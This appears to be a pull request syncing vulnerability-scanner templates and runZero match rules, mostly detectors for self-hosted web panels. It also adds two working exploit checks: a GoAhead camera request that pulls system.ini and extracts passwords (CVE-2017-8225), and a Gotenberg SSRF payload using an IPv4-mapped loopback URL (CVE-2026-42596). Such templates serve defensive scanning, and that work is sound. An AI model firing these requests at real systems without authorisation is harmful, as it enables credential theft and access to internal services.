### PR TITLE
upstream sync (semantic): changes requiring review

### DIFF
--- a/http/cves/2017/CVE-2017-8225.yaml
+++ b/http/cves/2017/CVE-2017-8225.yaml
@@ -19,7 +19,7 @@ info:
     epss-score: 0.18005
     epss-percentile: 0.96975
   metadata:
-    runzero-match: service["product"] matches "GoAhead.Webs"
+    runzero-match: service["product"] matches "GoAhead Webserver"
     fofa-query: "GoAhead-Webs"
     max-request: 1
     shodan-query: "GoAhead-Webs"

--- a/http/cves/2017/CVE-2017-8225.yaml
+++ b/http/cves/2017/CVE-2017-8225.yaml
@@ -1,0 +1,57 @@
+id: CVE-2017-8225
+info:
+  name: GoAhead Camera - Credential Disclosure
+  author: K3ysTr0K3R
+  severity: critical
+  description: |
+    GoAhead camera credential disclosure vulnerability in system.ini. The vulnerability affects certain Wireless IP Camera (P2P) WIFICAM devices and allows unauthenticated remote attackers to access the system.ini configuration file through a crafted HTTP request. The exposed configuration may contain sensitive authentication credentials, including usernames and passwords.
+  impact: |
+    Successful exploitation can disclose camera authentication credentials to an unauthenticated remote attacker, potentially allowing unauthorized access to the affected device.
+  remediation: |
+    Update affected camera firmware to the latest available version. Where firmware updates are unavailable, restrict access to the camera's HTTP interface and avoid exposing the device directly to untrusted networks.
+  reference:
+    - https://github.com/K3ysTr0K3R/CVE-2017-8225-EXPLOIT
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8225
+  classification:
+    cvss-score: 9.8
+    cve-id: CVE-2017-8225
+    cwe-id: CWE-200
+    epss-score: 0.18005
+    epss-percentile: 0.96975
+  metadata:
+    runzero-match: service["product"] matches "(?i)GoAhead.Webs"
+    fofa-query: "GoAhead-Webs"
+    max-request: 1
+    shodan-query: "GoAhead-Webs"
+    verified: true
+  tags: camera,credentials,cve,cve2017,goahead,vkev
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/system.ini?loginuse&loginpas"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "<html"
+        negative: true
+      - type: word
+        part: content_type
+        words:
+          - "text/plain"
+      - type: regex
+        part: body
+        regex:
+          - '[a-zA-Z0-9]{0,10}(admin|user|guest|root|operator|supervisor|tech|service|manager|default|demo|666666|888888)[a-zA-Z0-9]{0,10}'
+    extractors:
+      - type: regex
+        part: body
+        name: password
+        group: 1
+        regex:
+          - '(?:[a-zA-Z0-9]{0,10}(?:admin|user|guest|root|operator|supervisor|tech|service|manager|default|demo|666666|888888)[a-zA-Z0-9]{0,10}).{20}([ -~]{1,31})'
+        # digest: 4b0a00483046022100fe9cf84b7e17fd1dbc7b5e7ea22248282085802c85b90ddf474944b44c960916022100ba5c25206184a6141dc04cbe7c3f059fdc47fe98c142ec343eeb096a392e58d0:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2017/CVE-2017-8225.yaml
+++ b/http/cves/2017/CVE-2017-8225.yaml
@@ -19,7 +19,7 @@ info:
     epss-score: 0.18005
     epss-percentile: 0.96975
   metadata:
-    runzero-match: service["product"] matches "(?i)GoAhead.Webs"
+    runzero-match: service["product"] matches "GoAhead.Webs"
     fofa-query: "GoAhead-Webs"
     max-request: 1
     shodan-query: "GoAhead-Webs"

--- a/http/cves/2026/CVE-2026-2614.yaml
+++ b/http/cves/2026/CVE-2026-2614.yaml
@@ -22,7 +22,7 @@ info:
     epss-score: 0.02982
     epss-percentile: 0.86329
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "MLflow"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^MLflow$"}) || any(each(service["html.titles"]), {# matches "^MLflow AI Gateway$"})
     max-request: 3
     product: mlflow
     shodan-query: title:"MLflow"

--- a/http/cves/2026/CVE-2026-2614.yaml
+++ b/http/cves/2026/CVE-2026-2614.yaml
@@ -19,15 +19,16 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2026-2614
     cwe-id: CWE-22
-    epss-score: 0.02914
-    epss-percentile: 0.85995
+    epss-score: 0.02982
+    epss-percentile: 0.86329
   metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "MLflow"})
     max-request: 3
     product: mlflow
     shodan-query: title:"MLflow"
     vendor: mlflow
     verified: true
-  tags: cve,cve2026,lfi,mlflow,traversal
+  tags: cve,cve2026,lfi,mlflow,traversal,vkev
 variables:
   model: '{{to_lower(rand_base(10))}}'
 http:
@@ -38,7 +39,7 @@ http:
         type: regex
       - status:
           - 200
-        # digest: 490a004630440220104ad9f8bed7d148b5c925d95535c149b6d79a7515bff1b3cc885d53adfe0be00220183f353aa2a42f3c86ca10962e57393b86f1134c96df82591ee3a4183e416f91:922c64590222798bb761d5b6d8e72950
+        # digest: 490a0046304402204deed639e6e90cabbfc49ce93359f0a66fc17a6422bcc1a9a721c13b90bd535702202ebed9897b088aa3012e9c8e505b3ee9093951e4c3557de461f4791c534ef30b:922c64590222798bb761d5b6d8e72950
 
         type: status
     matchers-condition: and

--- a/http/cves/2026/CVE-2026-42596.yaml
+++ b/http/cves/2026/CVE-2026-42596.yaml
@@ -1,0 +1,47 @@
+id: CVE-2026-42596
+info:
+  name: Gotenberg < 8.31.0 - Server-Side Request Forgery
+  author: str4k3r
+  severity: critical
+  description: |
+    Gotenberg before 8.31.0 is vulnerable to server-side request forgery (SSRF) due to insufficient validation of URLs in the downloadFrom API. An unauthenticated attacker can exploit the flaw by providing specially crafted IPv4-mapped IPv6 addresses (such as http://[::ffff:127.0.0.1]) that bypass the deny-list and allow access to internal resources. Fixed versions properly recognize these addresses and prevent such requests.
+  reference:
+    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-4vmc-gm8v-m35h
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-42596
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-42596
+    cwe-id: CWE-918
+    cpe: cpe:2.3:a:gotenberg:gotenberg:*:*:*:*:*:*:*:*
+    epss-score: 0.00352
+    epss-percentile: 0.27962
+  metadata:
+    runzero-match: service["product"] matches "(?i)Gotenberg"
+    fofa-query: "Gotenberg"
+    max-request: 1
+    shodan-query: "Gotenberg"
+    verified: true
+  tags: cve,cve2026,gotenberg,ssrf
+http:
+  - raw:
+      - |
+        POST /forms/libreoffice/convert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----testBoundary
+
+        ------testBoundary
+        Content-Disposition: form-data; name="downloadFrom"
+
+        [{"url":"http://[::ffff:127.0.0.1]:3000/health"}]
+        ------testBoundary--
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "No 'Content-Disposition' header from 'http://[::ffff:127.0.0.1]:3000/health'"
+      - type: status
+        status:
+          - 400
+        # digest: 4a0a0047304502207932c8856d3df7122f4b4f9b6cfa6f9509efa35aafc3785c3203bf3dfa7425a4022100ab7156ae9a3b253261acc0053593ca94f008a1f0461e148438b42973ba84bfdb:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-42596.yaml
+++ b/http/cves/2026/CVE-2026-42596.yaml
@@ -17,7 +17,7 @@ info:
     epss-score: 0.00352
     epss-percentile: 0.27962
   metadata:
-    runzero-match: service["product"] matches "(?i)Gotenberg"
+    runzero-review: REJECT/2026-08-31/Intrusive, downloads from an external IP
     fofa-query: "Gotenberg"
     max-request: 1
     shodan-query: "Gotenberg"

--- a/http/cves/2026/CVE-2026-42596.yaml
+++ b/http/cves/2026/CVE-2026-42596.yaml
@@ -17,7 +17,7 @@ info:
     epss-score: 0.00352
     epss-percentile: 0.27962
   metadata:
-    runzero-review: REJECT/2026-08-31/Intrusive, downloads from an external IP
+    runzero-match: any(each(service["http.bodies"]), {# matches `Hey, Gotenberg has no UI, it's an API\.`})
     fofa-query: "Gotenberg"
     max-request: 1
     shodan-query: "Gotenberg"

--- a/http/exposed-panels/chatwoot-super-admin-panel.yaml
+++ b/http/exposed-panels/chatwoot-super-admin-panel.yaml
@@ -1,0 +1,36 @@
+id: chatwoot-super-admin-panel
+info:
+  name: Chatwoot Super Admin Panel - Detect
+  author: RootKaito
+  severity: info
+  description: |
+    Chatwoot Super Admin login panel was detected.
+  reference:
+    - https://www.chatwoot.com/
+    - https://github.com/chatwoot/chatwoot
+  classification:
+    cpe: cpe:2.3:a:chatwoot:chatwoot:*:*:*:*:*:*:*:*
+  metadata:
+    runzero-match: service["product"] matches "(?i)chatwoot"
+    max-request: 1
+    product: chatwoot
+    vendor: chatwoot
+    verified: true
+  tags: chatwoot,detect,discovery,login,panel
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/super_admin/sign_in"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "new_super_admin"
+          - "Chatwoot"
+        condition: and
+        case-insensitive: true
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a004730450221009999f22a892f558f6362b1d4b625e7cf66a5967f045abda6b3d63270f3be93020220150208a60401efef70c8c09e024bebf0806cc9f9526d48d8f2184fc449930dea:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/chatwoot-super-admin-panel.yaml
+++ b/http/exposed-panels/chatwoot-super-admin-panel.yaml
@@ -11,7 +11,7 @@ info:
   classification:
     cpe: cpe:2.3:a:chatwoot:chatwoot:*:*:*:*:*:*:*:*
   metadata:
-    runzero-match: service["product"] matches "(?i)chatwoot"
+    runzero-match: any(each(service["http.bodies"]), {# matches "window.chatwootConfig"})
     max-request: 1
     product: chatwoot
     vendor: chatwoot

--- a/http/exposed-panels/docmost-panel.yaml
+++ b/http/exposed-panels/docmost-panel.yaml
@@ -1,0 +1,32 @@
+id: docmost-panel
+info:
+  name: Docmost Panel - Detect
+  author: ChrisJr404
+  severity: info
+  description: |
+    Detected Docmost (docmost.com / github.com/docmost/docmost) was an open-source self-hosted wiki and documentation collaboration platform. Default Docker port 3000. Exposed instances may reveal internal spaces, pages and workspace member details.
+  reference:
+    - https://github.com/docmost/docmost
+    - https://docmost.com/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Docmost"})
+    fofa-query: title="Docmost"
+    max-request: 1
+    product: docmost
+    shodan-query: http.title:"Docmost"
+    vendor: docmost
+    verified: false
+  tags: detect,discovery,docmost,panel,selfhosted,wiki
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains_all(to_lower(body), \"<title>docmost</title>\", \"apple-mobile-web-app-title\")"
+        condition: and
+        # digest: 4b0a00483046022100c89abc0322267402ad58340772d94f6e9b3b5c2ed948ed98a425400021aff227022100dc99ba666fbd31e67c884ccec4d9aa3a83e8610bcd4e2a2ef894bff58b5e292b:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/docmost-panel.yaml
+++ b/http/exposed-panels/docmost-panel.yaml
@@ -9,7 +9,7 @@ info:
     - https://github.com/docmost/docmost
     - https://docmost.com/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Docmost"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Docmost$"})
     fofa-query: title="Docmost"
     max-request: 1
     product: docmost

--- a/http/exposed-panels/donetick-panel.yaml
+++ b/http/exposed-panels/donetick-panel.yaml
@@ -9,7 +9,7 @@ info:
     - https://github.com/donetick/donetick
     - https://donetick.com/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Donetick"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Donetick$"})
     fofa-query: title="Donetick"
     max-request: 1
     product: donetick

--- a/http/exposed-panels/donetick-panel.yaml
+++ b/http/exposed-panels/donetick-panel.yaml
@@ -1,0 +1,32 @@
+id: donetick-panel
+info:
+  name: Donetick Panel - Detect
+  author: ChrisJr404
+  severity: info
+  description: |
+    Donetick (donetick.com / github.com/donetick/donetick) is an open-source self-hosted task and chore manager with a Go backend and a React frontend. Default Docker port 2021. Exposed instances may reveal household task lists, members, and schedules.
+  reference:
+    - https://github.com/donetick/donetick
+    - https://donetick.com/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Donetick"})
+    fofa-query: title="Donetick"
+    max-request: 1
+    product: donetick
+    shodan-query: http.title:"Donetick"
+    vendor: donetick
+    verified: true
+  tags: detect,discovery,donetick,panel,selfhosted,tasks
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(to_lower(body), "<title>donetick</title>")'
+        condition: and
+        # digest: 4a0a0047304502206cb98631ba438dcec603d083ead06b2c31a6ede8d615cbfbea4f5d70c4d03698022100af62b441ff49c76aafbd5938c2edf64145103dff08af435d54e963d8de49051a:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/linkding-panel.yaml
+++ b/http/exposed-panels/linkding-panel.yaml
@@ -1,0 +1,32 @@
+id: linkding-panel
+info:
+  name: Linkding Panel - Detect
+  author: ChrisJr404
+  severity: info
+  description: |
+    linkding (github.com/sissbruecker/linkding) is a popular open-source self-hosted bookmark manager built on Django. Default Docker port 9090. Exposed instances may reveal users' saved bookmarks, tags, and archived pages.
+  reference:
+    - https://github.com/sissbruecker/linkding
+    - https://linkding.link/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Linkding"})
+    fofa-query: title="Linkding"
+    max-request: 2
+    product: linkding
+    shodan-query: http.title:"Linkding"
+    vendor: sissbruecker
+    verified: false
+  tags: bookmarks,detect,discovery,linkding,panel,selfhosted
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(to_lower(body), "self-hosted bookmark service", "linkding")'
+        condition: and
+        # digest: 490a0046304402205ec71514a814f4d610849168a45016e34065e975524b07deb1aed3f1cd1af8820220041ea97cbcdb84313e329205c567cee6c07c926bfc1dc887008ea9cf839e3e46:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/romm-panel.yaml
+++ b/http/exposed-panels/romm-panel.yaml
@@ -10,7 +10,7 @@ info:
     - https://romm.app/
     - https://docs.romm.app/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "RomM"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^RomM$"})
     fofa-query: title="RomM"
     max-request: 1
     product: romm

--- a/http/exposed-panels/romm-panel.yaml
+++ b/http/exposed-panels/romm-panel.yaml
@@ -1,0 +1,38 @@
+id: romm-panel
+info:
+  name: RomM Panel - Detect
+  author: ChrisJr404
+  severity: info
+  description: |
+    RomM (romm.app / github.com/rommapp/romm) is a popular open-source self-hosted ROM manager and player. The unauthenticated /api/heartbeat endpoint returns a JSON config snapshot including the running version, enabled metadata sources, and hosted platforms. Exposed instances leak this configuration and point to a browsable ROM library.
+  reference:
+    - https://github.com/rommapp/romm
+    - https://romm.app/
+    - https://docs.romm.app/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "RomM"})
+    fofa-query: title="RomM"
+    max-request: 1
+    product: romm
+    shodan-query: http.title:"RomM"
+    vendor: rommapp
+    verified: true
+  tags: detect,discovery,panel,rom,romm,selfhosted
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/heartbeat"
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains_all(body, "\"SHOW_SETUP_WIZARD\"", "\"METADATA_SOURCES\"", "\"IGDB_API_ENABLED\"", "\"FS_PLATFORMS\"")'
+        condition: and
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"VERSION"\s*:\s*"([^"]+)"'
+        # digest: 4b0a0048304602210086ffaf226699a9b284e6067c6a7c70c6d996eac5098c15569191b87c9beb3e4a022100f4917dccd99cc76c28e0367f9b98d91d96187e5da13183079b47f1c643b89631:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/signoz-panel.yaml
+++ b/http/exposed-panels/signoz-panel.yaml
@@ -17,20 +17,35 @@ info:
     vendor: signoz
     verified: false
   tags: detect,observability,oss,panel,signoz
+flow: http(1) && http(2)
 http:
-  - matchers:
+  - host-redirects: true
+    matchers:
       - condition: and
-        part: body
-        type: word
-        words:
-          - Open source Observability platform | SigNoz
-          - SigNoz is an open source observability platform
-      - status:
-          - 200
-        # digest: 4a0a00473045022073e54d1e432bfab05f1102527d3a0ef0f8eae2dc1b4da7e28f298c351f224354022100ff0d250c2437edcad3835f03391a3d7300325e44ddc9d0c0b1d7478b863f66af:922c64590222798bb761d5b6d8e72950
-
-        type: status
-    matchers-condition: and
+        dsl:
+          - status_code == 200
+          - contains(to_lower(body), "signoz")
+        internal: true
+        type: dsl
+    max-redirects: 2
     method: GET
     path:
       - '{{BaseURL}}'
+  - extractors:
+      - group: 1
+        part: body
+        regex:
+          - '"version"\s*:\s*"([^"]+)"'
+        # digest: 4b0a00483046022100e0996b004410ed7de44782652071a0149a937221dcc53b0cdca66fd66368632f022100bf5ff31bffbe8b24db68812a997363022320d93483d83b56692ceb225c746e12:922c64590222798bb761d5b6d8e72950
+
+        type: regex
+    matchers:
+      - condition: and
+        dsl:
+          - status_code == 200
+          - contains(content_type, "application/json")
+          - contains_all(body, "\"version\"", "\"ee\"", "\"setupCompleted\"")
+        type: dsl
+    method: GET
+    path:
+      - '{{BaseURL}}/api/v1/version'

--- a/http/exposed-panels/silverbullet-panel.yaml
+++ b/http/exposed-panels/silverbullet-panel.yaml
@@ -9,7 +9,7 @@ info:
     - https://github.com/silverbulletmd/silverbullet
     - https://silverbullet.md/
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "SilverBullet"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^SilverBullet$"})
     fofa-query: title="SilverBullet"
     max-request: 1
     product: silverbullet

--- a/http/exposed-panels/silverbullet-panel.yaml
+++ b/http/exposed-panels/silverbullet-panel.yaml
@@ -1,0 +1,32 @@
+id: silverbullet-panel
+info:
+  name: SilverBullet Panel - Detect
+  author: ChrisJr404
+  severity: info
+  description: |
+    SilverBullet (silverbullet.md / github.com/silverbulletmd/silverbullet) is an open-source self-hosted, browser-based markdown notes and personal knowledge database. Instances left without authentication expose the full note space for reading and editing.
+  reference:
+    - https://github.com/silverbulletmd/silverbullet
+    - https://silverbullet.md/
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "SilverBullet"})
+    fofa-query: title="SilverBullet"
+    max-request: 1
+    product: silverbullet
+    shodan-query: http.title:"SilverBullet"
+    vendor: silverbulletmd
+    verified: true
+  tags: detect,discovery,markdown,notes,panel,selfhosted,silverbullet
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "<title>SilverBullet</title>")'
+        condition: and
+        # digest: 4a0a0047304502207c9e498944cd3e665ce331113a926f20b8656c4c72b26776f0e190737ec048bf022100dd77400e9373897051a8bae198d9856380daec6651177aa8144de4441621392e:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
## Upstream Sync — Semantic Changes

> Targets the general branch. Review before merging.

### New templates — auto-generated match (9)

| Template | Severity | Notable tags | Note |
|---|---|---|---|
| `http/exposed-panels/docmost-panel.yaml` | ⚪ info | panel | — |
| `http/cves/2017/CVE-2017-8225.yaml` | 🔴 critical | vkev | — |
| `http/cves/2026/CVE-2026-42596.yaml` | 🔴 critical | — | — |
| `http/exposed-panels/donetick-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/linkding-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/silverbullet-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/chatwoot-super-admin-panel.yaml` | ⚪ info | panel, login | — |
| `http/exposed-panels/romm-panel.yaml` | ⚪ info | panel | — |
| `http/cves/2026/CVE-2026-2614.yaml` | 🟠 high | vkev | _(became interesting: gained vkev tag)_ |

### Existing runZero templates — semantic changes (1)

| Template | Change |
|---|---|
| `http/exposed-panels/signoz-panel.yaml` | flow: added "http(1) && http(2)" |
| `http/exposed-panels/signoz-panel.yaml` | http: changed |

---

### ⚠️ Action items (9)

- [x] `http/cves/2017/CVE-2017-8225.yaml` — auto-generated `runzero-match` (vkev critical); please verify
- [x] `http/cves/2026/CVE-2026-2614.yaml` — auto-generated `runzero-match` (vkev high (gained vkev tag)); please verify
- [x] `http/cves/2026/CVE-2026-42596.yaml` — auto-generated `runzero-match` (critical); please verify
- [x] `http/exposed-panels/chatwoot-super-admin-panel.yaml` — auto-generated `runzero-match` (panel, login info); please verify
- [x] `http/exposed-panels/docmost-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/donetick-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/linkding-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/romm-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/silverbullet-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
